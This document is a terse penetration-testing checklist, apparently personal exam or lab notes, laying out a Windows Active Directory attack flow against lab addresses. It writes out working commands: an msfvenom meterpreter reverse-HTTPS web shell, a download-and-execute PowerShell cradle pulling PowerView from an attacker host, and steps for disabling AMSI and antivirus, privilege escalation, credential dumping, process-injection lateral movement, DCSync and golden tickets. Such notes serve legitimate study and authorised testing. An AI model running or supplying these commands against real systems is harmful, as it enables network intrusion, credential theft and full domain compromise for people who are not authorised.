Checklist / Flow

Enumeration, also check for 5985/5986 for evil-winrm
sudo nmap -A -sC -Pn 192.168.120.130-132 -vv
Check web ser:
email present = phishing with doc / hta
command utilities / debug page = cmd injection RCE with rev.ps1
upload available = web shell (e.g. aspx)
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f aspx -o /home/kali/met.aspx
+ non-emulated API av bypass + shellcode encoding
finding upload dir:
gobuster dir -e -u http://192.168.120.132/ -w /usr/share/wordlists/dirb/common.txt
Post-Exploit Enum
QoL: meterpreter - execute -H -f notepad -> migrate
Check:
applocker
lsa ppl
disable amsi to run PowerView
(new-object system.net.webclient).downloadstring('http://192.168.119.120/powerview.ps1') | IEX
Get-DomainComputer, Get-DomainUser, Get-DomainGroup, Kerberos delegation
Privilege Escalation, reflectively load printspoofer when service account
Disable AV
Dump credentials, (meterpreter upload download), enum for config files, custom files etc.
Use the credentials to perform possible domain attacks
Possibly became the admin user on a vulnerable ser PtT with impersonated tix > disable AV
Transfer files through shares (controlled host 1 to newly compromised host 2):
copy C:\inetpub\wwwroot\upload\inject.exe \\file01\c$
use fileless lateral movement with process injection to control host 2 from host 1
copy c:\inject.exe \\dc02\c$ -> lat.exe dc02 sensorservice C:\inject.exe
Repeat cred dumps..., possible to look for impersonation
DCSync when compromised domain for other account access, golden ticket with krbtgt of the dc

PreviousLigolo

Last updated 9 months ago